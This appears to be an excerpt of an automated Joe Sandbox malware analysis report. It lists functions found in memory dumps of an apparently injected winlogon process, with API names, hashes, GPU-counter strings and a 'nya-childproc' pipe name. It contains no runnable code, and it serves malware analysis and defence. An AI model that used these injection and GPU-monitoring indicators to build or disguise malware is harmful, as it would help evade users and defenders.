                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: 37fd39670bbdcc54ea09762e972c4b0ccfec49a203bbfccbc513fbeee86dfb37
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: EF516236210F94A6E724CFA6E44835A77A1FB88F99F448525DE8A07B98EF3CC055C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: e6ef2d74a113b6a2436a0bf4e662f067906ac5c54f8ed1bf6393795d3f8873bc
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: 7F516236214F94EAE764CFAAE44839A77A2F798F9AF548124DE4A47758EF3CC045C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                          • API String ID: 740688525-1880043860
                                                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction ID: 3bbe528764dd29461f2b489f7bb424fdd3c8e1eb83be9ed074256bc9518d600c
                                                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction Fuzzy Hash: AF519139701F2471FE149BAAA8187A52290BB48BB2F588B25AE3947BD0EF38D445C751
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                          • API String ID: 740688525-1880043860
                                                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction ID: 0e80d652f4081b1e4fca29c38c4c1cd2ef8707dab7f660b0183de6f6bb59e2ad
                                                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction Fuzzy Hash: 5751C439700F2471EE15DBAEA8183A52391BB58BB2F688725AE3D873C0EF38D445C641
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction ID: 3a645e500603d2e49c7852b303aca20d04d2f933c99b688e966e8a5f8d7bf780
                                                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction Fuzzy Hash: E731D92A618E64B7E721CFA6A80C799B3A0FB88FD6F548525DE4943624EF38C455C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction ID: 3504f38e38e3fa029f540fcbe78c44e127b7d15fadd191a2f84b1cdbf063186f
                                                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction Fuzzy Hash: 7631D726600F60B7F725DF9AA80C759A3A0FF88FD6F548525DE8943AA8EF38C455C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction ID: 8ede8dfb4b41c7f54769feaf922c09e47b5f9363491bd1bbccb34bf8f014b086
                                                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction Fuzzy Hash: 8E31D926604E60BAE721CF96A80C799A3A1FB98FD7F548525DE4D83724EF38C555C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction ID: b10aa90a55d6ea0055f526c5676bc37cc43534038bcf9b837f612d60fdfb5a2b
                                                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction Fuzzy Hash: A931A539628F69A6E714EFAAA84C76973A0F784F96F548035DE4B43724EF38C451C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction ID: f704ab49293cf0e1ed31e914e4fc4bc4390b61966030aa4b8452262fc6a64487
                                                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction Fuzzy Hash: C731A539610F65A6F710DFAAA84876973A0FB84F96F548435DE4A43BA4EF38C441C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction ID: 9f3a192e19782f68c0455e06215ffa57fe3f949edc512479bfcf280111965ae0
                                                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction Fuzzy Hash: C7319339A10F65A6E750DFAAA84C76963E1F794F96F548025DE4A83724EF38C445C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: 40962d9037238da081206475ee908ce105132769ad07b7c55dbda3703558f768
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: 00D1D43A60CFA0AAEB20DFA9D44839D37A5F745789F248155EF8A57B9ADB34C481C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: a8fece186d101b847eca8a083d65235070164d711131e7fc5df78026c09f9aa6
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: 90D1C13A604FA0AAFB20DFA9D44839D37A0F74579AF209905EE8957FDADB34C591C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: e4e77bec6c3c76eda267b5a64cd10531dc381910f999623d3e16d62803294872
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: 15D1B436604FA0AAEB20DFADD44839D77A0F755789F349116EF8997B9ACB34C481CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000003.1989875649.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_3_225dc610000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction ID: e1890204962555f878dae4d699df8c2ef2e4cf9b7c5c3e4ddc42fda6e9e5fbcd
                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction Fuzzy Hash: C1D1C43A605F90A6EF60DFA9D4883AD77E0F74978BF148205EE8957B9ADB34C085C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: ececaa4767ccb3dcc2047e64bec21184c4e63965f1cad86239683dd7ac3fee11
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: 07418337218F94D6E760CF65E44879E77A1F388B99F548115DB8A07758EF38C449CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: 4c20dfc4af8bda4208fe4ae9ad067bd992ae1cd645f02af2b9241ee9954499fc
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: 94418137214F90DAE760CF65E45839E77B1F388B99F448115DA890BB98DF38C449CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: d71e7553ea6a1f3aca9db5fdb5635cc43e37d640ac58699523fa530d5dd3bff1
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: 33419277214F90EAE760CF65E44839E77A1F388B9AF548129DB8947758EF38C849CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\$nya-childproc
                                                          • API String ID: 166002920-3933612297
                                                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction ID: d2138c8d4f7d3247c7ae02ff7a74c34891107d2cf3aecf89818fa6b04c249ee7
                                                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction Fuzzy Hash: 22115E3A628B5093E7108F69F41C75A7760F789BD6FA48315EA5A46BA8DF3CC144CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\$nya-childproc
                                                          • API String ID: 166002920-3933612297
                                                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction ID: ef957a4295e74cbf3163430bc7be43bd0f83cb6e2c1149b6374ee47fbb104cec
                                                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction Fuzzy Hash: 4C11793A614B60D2F710CF69F41875A7760F788BD6FA48311EA9A06AE8DF3CC148CB41
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\$nya-childproc
                                                          • API String ID: 166002920-3933612297
                                                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction ID: 12dfc8dfee2a984abc70d42e87e5253ec343e094988bec53a7eb661a728d10ba
                                                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction Fuzzy Hash: CE115E3A614B5093E710CF69F45875A7761F389BD6F948315EA5A42BA8DF3CC144CB40
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
